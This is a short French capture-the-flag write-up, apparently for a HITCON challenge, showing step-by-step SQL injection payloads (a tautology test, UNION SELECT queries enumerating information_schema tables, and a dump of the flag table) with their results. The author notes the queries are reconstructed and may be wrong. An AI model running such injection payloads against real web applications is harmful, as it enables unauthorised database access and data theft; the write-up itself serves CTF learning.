52.197.140.254/are_you_rich/verify.php (maintenant indisponible)
En premier il fallait trouver que le chmap était injectable.
Avec des requêtes du genre:
blahblahblahblah' OR 1 = 1 --On va chercher les information de la base de données.
' UNION ALL SELECT database() LIMIT 1 --On obtenait: areyourich.
Puis on va chercher les information des tables.
' UNION ALL SELECT COUNT(*) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'areyourich' LIMIT 1 --On obtenait: 2.
' UNION ALL SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'areyourich' LIMIT 1 OFFSET 0 --On obtenait: issued_address.
' UNION ALL SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'areyourich' LIMIT 1 OFFSET 1 --On obtenait: flag1.
Finalement récupérer le flag!
' UNION ALL SELECT * FROM flag1 LIMIT 1 --On obtenait: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}.
🔥 🚩
Il me semble que c'était ça les requêtes SQL à faire, mais j'ai peux-être fait des erreurs ; le site était déjà indisponible lorsque je les ai écrites.
N'hésitez pas à suggérer des modifications. 😄